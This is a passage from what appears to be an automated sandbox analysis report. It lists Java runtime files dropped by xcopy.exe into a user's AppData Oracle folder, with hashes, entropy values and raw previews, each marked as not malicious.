                                                                                                                                                                                                                                  Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                  MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                  SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                  SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                                                                                                                                                                                                                  SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_LinkDrop32x32.gif

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 31 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):168
                                                                                                                                                                                                                                  Entropy (8bit):6.465243369905675
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:CruuU/XExlHrZauowM7Qt/wCvTjh2Azr8ptBNKtWwUzJZmQYRNbC1MIQvEn:KP0UpawMcx3UAzADBNwUlZaCzn
                                                                                                                                                                                                                                  MD5:694A59EFDE0648F49FA448A46C4D8948
                                                                                                                                                                                                                                  SHA1:4B3843CBD4F112A90D112A37957684C843D68E83
                                                                                                                                                                                                                                  SHA-256:485CBE5C5144CFCD13CC6D701CDAB96E4A6F8660CBC70A0A58F1B7916BE64198
                                                                                                                                                                                                                                  SHA-512:CF2DFD500AF64B63CC080151BC5B9DE59EDB99F0E31676056CF1AFBC9D6E2E5AF18DC40E393E043BBBBCB26F42D425AF71CCE6D283E838E67E61D826ED6ECD27
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:GIF89a.. ................!.......,...... ...yL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj........k.-mF.6.'.....`1]......u.Q.r.V..C......f.P..;

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_LinkNoDrop32x32.gif

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):153
                                                                                                                                                                                                                                  Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                  MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                  SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                  SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                                                                                                                                                                                                                  SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_MoveDrop32x32.gif

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 31 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):147
                                                                                                                                                                                                                                  Entropy (8bit):6.147949937659802
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:CruuU/XExlHrSauZKwM7Qt/wCvTjh2Azr8ptBNKtWXOh6WoXt2W:KP0UvEKwMcx3UAzADBNXOh6h9p
                                                                                                                                                                                                                                  MD5:CC8DD9AB7DDF6EFA2F3B8BCFA31115C0
                                                                                                                                                                                                                                  SHA1:1333F489AC0506D7DC98656A515FEEB6E87E27F9
                                                                                                                                                                                                                                  SHA-256:12CFCE05229DBA939CE13375D65CA7D303CE87851AE15539C02F11D1DC824338
                                                                                                                                                                                                                                  SHA-512:9857B329ACD0DB45EA8C16E945B4CFA6DF9445A1EF457E4B8B40740720E8C658301FC3AB8BDD242B7697A65AE1436FD444F1968BD29DA6A89725CDDE1DE387B8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:GIF89a.. ................!.......,...... ...dL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj.....-.kj..m.....X,&.......S..;

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_MoveNoDrop32x32.gif

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):153
                                                                                                                                                                                                                                  Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                  MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                  SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                  SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                                                                                                                                                                                                                  SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\javafx.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):56
                                                                                                                                                                                                                                  Entropy (8bit):4.46299398428717
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:CEBqRM9LTAGQdLVrKmqRM9LHQIuHI:CEAsnAbLZKrszQi
                                                                                                                                                                                                                                  MD5:BEA65F7B8645C5FB1C3E8C980F1F955C
                                                                                                                                                                                                                                  SHA1:9FEC7A11BB6341C7CC81C80FAC8204BC4276710B
                                                                                                                                                                                                                                  SHA-256:F74D4CC6A7F5DC7F5821D8A6D0D5D7ABA345A1E9AE8FD3EA2323F40F02B05330
                                                                                                                                                                                                                                  SHA-512:5C294A24B0DDE6F472BBC52DDE084AC3D0FA60080BBBC075312B951A6B3CB703DE3D5164169542C605C1913971D123F1E3A74B3640114BABB182DF570217412C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:javafx.runtime.version=8.0.381.javafx.runtime.build=b09.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\javaws.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):956923
                                                                                                                                                                                                                                  Entropy (8bit):5.933997747475344
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:9D3KFhiwi2aA0yAaLwLbrJIVR4902ikOln27yrZM85G/1pCRZvLYrrorubXFM8/V:YFJ0yKb9a2LtVoiY0Dh
                                                                                                                                                                                                                                  MD5:29769612ADAFBA5029AF1F5A56A49FE1
                                                                                                                                                                                                                                  SHA1:959D03E5621BD9FDF276F24E0319EAB548207FBD
                                                                                                                                                                                                                                  SHA-256:A30389DA600A79FDFA1017132EF1317F005BD0F91160542C902873D99447283F
                                                                                                                                                                                                                                  SHA-512:321EFB4CB2D51DFE06F8D9A0E000EBCC8111DC7A95235587F2D87695AD3CF09EE27E3836C6BF2F335F1D0B30F788C4AC2F6AAB4F676CD48177222A74825DBCD2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK........Cp.V................META-INF/....PK........Bp.VB1.Wi...i.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.6..Created-By: 1.8.0_381-b09 (Oracle Corporation)....PK........Bp.V................com/PK........Bp.V................com/sun/PK........Cp.V................com/sun/javaws/PK........Bp.V................com/sun/javaws/exceptions/PK........Bp.V................com/sun/javaws/jnl/PK........Bp.V................com/sun/javaws/net/PK........Bp.V................com/sun/javaws/net/protocol/PK........Bp.V............ ...com/sun/javaws/net/protocol/jar/PK........Bp.V................com/sun/javaws/progress/PK........Bp.V................com/sun/javaws/security/PK........Cp.V................com/sun/javaws/ui/PK........Cp.V................com/sun/javaws/util/PK........Cp.V................com/sun/jnlp/PK........Ap.V................javax/PK........Cp.V................javax/jnlp/PK........Bp.V.T..........#...com/sun/javaws/BrowserSupport.class.......1.&...()V...(

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\jce.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):122724
                                                                                                                                                                                                                                  Entropy (8bit):7.918567382108161
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:p+uhK+XLGLuDfH3HiMAHElMueD+UgUBvVE:/f6Y3HiLvJ+Uju
                                                                                                                                                                                                                                  MD5:E0B7E0F36B9FC43D13403145DB82E758
                                                                                                                                                                                                                                  SHA1:DEF42078CFA315E98393C69963EFB4E35E2E28A8
                                                                                                                                                                                                                                  SHA-256:4362C179BB78107777D6A0557693E65EB2B318C26642162F89509DFDAB8C97FE
                                                                                                                                                                                                                                  SHA-512:5074A7CEB9621096F3BBF419D32AC260EA6D9D09C758544C2761121026C2B9DB0B6617806D3B692347B685D541123F4EDA99DCBAA29D9C9A2D740B22C44BF7BB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK........{.cV................META-INF/MANIFEST.MF.Y..X..Y.C,j.mX&B........y..1.. ..7.YY.U.(..J2.......q..Vi....+....~....>.......a.....E......m...._.jJ..z}............&..(..<Q.u....~...u....~q.._........c.........].B*..........z5........W.[......Bw../..j7..'....l..v./w7.....?.1..n..T.....j...\.._......%.....1..{..e...u.O.[..B..\7cjOh1/.4R..r%.8..o..+.0v....\O.!3.a.j..&.......d..<.2.M..Tf..|...[....n.S..".d/..a..'RL.y...Ca\....G..n...4E.f..u.Q.7a..(.I.n..C...=G..n....h5...=.i......8{...l.|..........i.N.|.Q$.(..J.yQ..Z.3z..l.*..JDLOnB}{Q."..........L.W.2..-[&.......o#..xt.._}.lu..<...[M......2._..j.~._....5...h..F.6.@..`.u.o.R.......).X..h.<.z.na.P.C...|.aU..g.....`...F.!4.*..a..M.(li2.-<.~F5.<..;.Wg.Z<...9g..^:.l..[..9.>..jdF......*.p.....B.E..c^..!..Ho...E....K..L...r...F.+].!.^C.]..I.HQ.`.........}/..i.A...k.Z=...Wo&]...m......2...bQ.~.I..<&..&...............]8....^~...y..-....*R?..l..d.'b.|rN...ky..r.......my...d....d..p[............]p...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\jfr.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):574271
                                                                                                                                                                                                                                  Entropy (8bit):5.7807704652102805
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:Z5l+qU67FYWg+YWgYWeoXqgYSqYQh2f/m5NwaHkSIJHvWQ6Q7ooMcgH5lY7TQ5cu:Z5l+qU67FYWg+YWgYWeoXqgYSqYQh2fa
                                                                                                                                                                                                                                  MD5:CFBF1D7E15726ECBA7A7506B6E43EF1D
                                                                                                                                                                                                                                  SHA1:2CE147B0C1030003ABDB4323D4E2356104CBDA52
                                                                                                                                                                                                                                  SHA-256:C5FDD101242C9F7D47BD887F862C5A724AC2144E71DE22C2973B48F4DB4D0010
                                                                                                                                                                                                                                  SHA-512:1AB1D8A001ADDF8941ECDE71319E6CC2A71A1964FD397D95E1E4A0CFC0045BFBBBF334242522F37F0AEAFC8682C8D5A0B2E2A067233111CFAE86802203D7729E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/....PK.........p.V....?...?.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_381..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_291 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK.........n.VB.<>^...^...8...com/oracle/jrockit/jfr/client/EventSettingsBuilder.class.......4....5.f..g....f..4.h..4.i..j....f..4.k..l....m..4.n..o....f..4.p..q..r....f....s....t....u....v..w..x..y....z..{....|....}....~.................................#.........................)...................................................eventDefaultSets...Ljava/util/ArrayList;...Signature..DLjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventDefaultSet;>;...settings..ALjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventSetting;>;...eventDescriptorType..2Loracle/jrockit/jfr/openmbean

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\jfr\default.jfc

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20848
                                                                                                                                                                                                                                  Entropy (8bit):4.569027178886632
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:/JA1ySPBhRt0ng3Ca66LAsmztuxqCbCdCsCNG2ixzTJDZi5OAdzAMzVdWVqGKxtE:/J4yS5zaaedc2Fch8
                                                                                                                                                                                                                                  MD5:09FF01E042E7D016217A23F29250C193
                                                                                                                                                                                                                                  SHA1:E60D9AAA39C5F0EF4A54DA5107B0C75AB491DF0E
                                                                                                                                                                                                                                  SHA-256:05079C086677FF5ADA9853F60B7B1C623750C7A97C6EEC692E54AD7EBF51D343
                                                                                                                                                                                                                                  SHA-512:50ABC8F6C0EEEF68B600826FFB5ADC1C329996882D4EF378C65A1C5330E1177222E48FD1A0C4798116EE63CC231FFBD120E22ED82290D975DC81CA246F0E1CB3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8"?>.. . Recommended way to edit .jfc files is to use Java Mission Control,. see Window -> Flight Recorder Template Manager..-->..<configuration version="1.0" name="Continuous" description="Low overhead configuration safe for continuous use in production environments, typically less than 1 % overhead." provider="Oracle">.. <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.. <control>.. . Contents of the control element is not read by the JVM, it's used. by Java Mission Control to change settings that carry the control attribute.. -->.. <selection name="gc-level" default="detailed" label="Garbage Collector">. <option label="Off" name="off">off</option>. <option label="Normal" name="detailed">normal</option>. <option label="All" name="all">all</option>. </selection>.. <condition name="gc-enabled-normal" true="true" false="false">. <or>.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\jfr\profile.jfc

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20804
                                                                                                                                                                                                                                  Entropy (8bit):4.568706382799236
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:/fA1ypPOdhJt0ng3Ca66L0smztuxqHbHdHsHNG2iYzTJDZ95OAdzAMzVdWVqGKxW:/f4ypy3aamd79Mrhw
                                                                                                                                                                                                                                  MD5:67735A686D709D5612FAE97CD67ECF07
                                                                                                                                                                                                                                  SHA1:5AE707011FB0ADAF564D2C71D8E6443AADDD6809
                                                                                                                                                                                                                                  SHA-256:57F1556CD4A7554944B8339A4C29CC25C1C462418E42D22A2F84F8B713205826
                                                                                                                                                                                                                                  SHA-512:5BA2FB473FA4B3E6C4F13B0AADC5030D35498A8413C928CB6E5F67832CB164238222A21275E7E99CB476F095AB901250417D1F10B2F5E305BD13980182E9C38D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8"?>.. . Recommended way to edit .jfc files is to use Java Mission Control,. see Window -> Flight Recorder Template Manager..-->..<configuration version="1.0" name="Profiling" description="Low overhead configuration for profiling, typically around 2 % overhead." provider="Oracle">.. <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.. <control>.. . Contents of the control element is not read by the JVM, it's used. by Java Mission Control to change settings that carry the control attribute.. -->.. <selection name="gc-level" default="detailed" label="Garbage Collector">. <option label="Off" name="off">off</option>. <option label="Normal" name="detailed">normal</option>. <option label="All" name="all">all</option>. </selection>.. <condition name="gc-enabled-normal" true="true" false="false">. <or>. <test name="gc-level" operator="equal"

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\jfxswt.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33918
                                                                                                                                                                                                                                  Entropy (8bit):7.932455948320408
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:kYaExj8sT4fsUMLJgCsdw19SKYqLkClJzxeojN+WIGAQcrM:kYljDTI/MyCsdw1cj8LjN+W9CrM
                                                                                                                                                                                                                                  MD5:673A9978C583B1BB381E2265569CD908
                                                                                                                                                                                                                                  SHA1:09EB8FDA2FB44557A069EA989479154A5123A74D
                                                                                                                                                                                                                                  SHA-256:75C39AEB0892D8464EA42F9BF29C347D88CE857B28926B4F392AA2084B4F77E5
                                                                                                                                                                                                                                  SHA-512:BC8476C49565A2DE88F82255E213A3B69FD647E8F4AFAEDA6929EC92087C870032A514433768C0F6C0E955698B91236EF296D0C0638E57DAAC9AA712169468CF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK........R..V................META-INF/....PK........Q..V.c8.^...j.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%.....y...R.KRSt.*A:,.....u....4....sR......K.Fh.r.r..PK........R..V................javafx/PK........R..V................javafx/embed/PK........R..V................javafx/embed/swt/PK........'(.Vj...........%...javafx/embed/swt/CustomTransfer.class.T[S.F.=.MX(..!............8..`h.d....." yd..........4....%..k.N..ka.83..[.....|+...........#.OD..1...1.1.S1....*>..I..TL.....Y..*.S.q.-KAja..6.M.Y7V|.v...e............+...u...Z.....Z......k...O.v.....x..f...M.v...~I....j.N.(.R.... ..n.%).l:.N..,J...-.%.os:.v.K..V.._p.u.l..e...S5...^.....3+.Yy.h.RtGR..y.)..~...g..R.;5K...{.G.*..X.JP....D....8..[3.g...'d.e#Z.|c.j.t..F.w..t.W.j.,K[q.^..E.=M.a..6d.Z..yV.....=..........:.WG.............RA.<......qT...,*.=.....t\......(aI.2.....!..Jp.,..<.x..n.S....N.K.e.W....N.-..`....hmQ.E.fGE..$..n...4I{.......l_.)......?.Z>.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\jsse.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1790321
                                                                                                                                                                                                                                  Entropy (8bit):5.939561849305967
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:7jhqT+YELjm0Ru1G7ouJXe2bmficeH0nNXHcKqJGX:7jhXvR4G7XJnbUsHs3
                                                                                                                                                                                                                                  MD5:0951883FEBB57F245EE4F4B7ECDDD470
                                                                                                                                                                                                                                  SHA1:5C086340C6B584E326EC8043442E3030FE601C50
                                                                                                                                                                                                                                  SHA-256:9E15BE38FF68E974BC7D5015F305104E07F47A2522F4330530114D74113DAF9A
                                                                                                                                                                                                                                  SHA-512:B08C8016B7D767A04A9E815DD64EDA35448F604EB7A2ECB40810D5344947EA5277F0BFF82A69278F737410DF1AE24CAD3F85D07346E87A8B2B548F0ED6F1A690
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/....PK.........p.V....?...?.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_381..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_291 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK.........n.V`..b........+...com/sun/net/ssl/internal/ssl/Provider.class.......4.....()V...()Z...<init>...J..%com/sun/net/ssl/internal/ssl/Provider...install...isFIPS...serialVersionUID...sun/security/ssl/SunJSSE.,..c".J-.........(Ljava/lang/String;)V...(Ljava/security/Provider;)V...........................................Code...ConstantValue.1................................................*..............................*+..............................*+.........).............................)...........................PK.........n.V3.2........;...com/sun/net/ssl/internal/ssl/X5

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\jvm.hprof.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Algol 68 source, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4226
                                                                                                                                                                                                                                  Entropy (8bit):4.708892688554676
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:CYrYJDrYJ+RvJ3z3d9uGG7hPxTRnhTbraYfwE5DyK:CYrsDrsgvJ3z3buGG7LvSmhDz
                                                                                                                                                                                                                                  MD5:C677FF69E70DC36A67C72A3D7EF84D28
                                                                                                                                                                                                                                  SHA1:FBD61D52534CDD0C15DF332114D469C65D001E33
                                                                                                                                                                                                                                  SHA-256:B055BF25B07E5AC70E99B897FB8152F288769065B5B84387362BB9CC2E6C9D38
                                                                                                                                                                                                                                  SHA-512:32D82DAEDBCA1988282A3BF67012970D0EE29B16A7E52C1242234D88E0F3ED8AF9FC9D6699924D19D066FD89A2100E4E8898AAC67675D4CD9831B19B975ED568
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:Copyright (c) 2003, 2005, Oracle and/or its affiliates. All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions.are met:.. - Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer... - Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... - Neither the name of Oracle nor the names of its. contributors may be used to endorse or promote products derived. from this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS.IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,.THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR.PURPOSE ARE DISCLAIMED.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\logging.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2455
                                                                                                                                                                                                                                  Entropy (8bit):4.47026133037931
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:EmdS5PQQL8pRNYHjVsnkYXxtOGh1xdvjMgxH:G9NL3HjVLG1XrM8H
                                                                                                                                                                                                                                  MD5:809C50033F825EFF7FC70419AAF30317
                                                                                                                                                                                                                                  SHA1:89DA8094484891F9EC1FA40C6C8B61F94C5869D0
                                                                                                                                                                                                                                  SHA-256:CE1688FE641099954572EA856953035B5188E2CA228705001368250337B9B232
                                                                                                                                                                                                                                  SHA-512:C5AA71AD9E1D17472644EB43146EDF87CAA7BCCF0A39E102E31E6C081CD017E01B39645F55EE87F4EA3556376F7CAD3953CE3F3301B4B3AF265B7B4357B67A5C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:############################################################.# .Default Logging Configuration File.#.# You can use a different file by specifying a filename.# with the java.util.logging.config.file system property. .# For example java -Djava.util.logging.config.file=myfile.############################################################..############################################################.# .Global properties.############################################################..# "handlers" specifies a comma separated list of log Handler .# classes. These handlers will be installed during VM startup..# Note that these classes must be on the system classpath..# By default we only configure a ConsoleHandler, which will only.# show messages at the INFO and above levels..handlers= java.util.logging.ConsoleHandler..# To also add the FileHandler, use the following line instead..#handlers= java.util.logging.FileHandler, java.util.logging.ConsoleHandler..# Default global logging level..# This

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\management-agent.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):382
                                                                                                                                                                                                                                  Entropy (8bit):4.993267703911635
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:5jgCB4r/Rjgezbdy/oocj+od0X2K5YZ5/Cy9xxgsm4xq7lgxmzbdGh/7:5j7GJjpq1cCA0XPA/CcxRc6x2K/7
                                                                                                                                                                                                                                  MD5:7A26C9F31EBCEE53B813BB24DA580FEF
                                                                                                                                                                                                                                  SHA1:1ECE12D6182D5E8ACF5200E0202647E4E048A604
                                                                                                                                                                                                                                  SHA-256:6DB1FE5E7E897276A16C1AC5C9D1992636D3FB5D1E1A286A8BF5A49B51E495E8
                                                                                                                                                                                                                                  SHA-512:4059F8767A69147ADD24607B7CAD14994CA9E1EDC0213DCC189309CA5E663A0FBE4A6793B44E13382F6A41B79983F0034241DABA597F1F9B3921D73701B0C3B5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/......PK..............PK.........p.V................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u........Y.*h..%&.*8.....%...k.r9....:.$..[).....&.%....E..r.\.E....y...r..PK..#...l.......PK...........p.V..............................META-INF/....PK...........p.V#...l.....................=...META-INF/MANIFEST.MFPK..........}.........

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\management\jmxremote.access

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3998
                                                                                                                                                                                                                                  Entropy (8bit):4.420205717459709
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:OWi7j79eK8MCN/xK4ijnv+wtosJj/D9mQyZWZuQgQX+dv:OWiv7b8rNXE+wusxr9m5WZuVDv
                                                                                                                                                                                                                                  MD5:F63BEA1F4A31317F6F061D83215594DF
                                                                                                                                                                                                                                  SHA1:21200EAAD898BA4A2A8834A032EFB6616FABB930
                                                                                                                                                                                                                                  SHA-256:439158EB513525FEDA19E0E4153CCF36A08FE6A39C0C6CEEB9FCEE86899DD33C
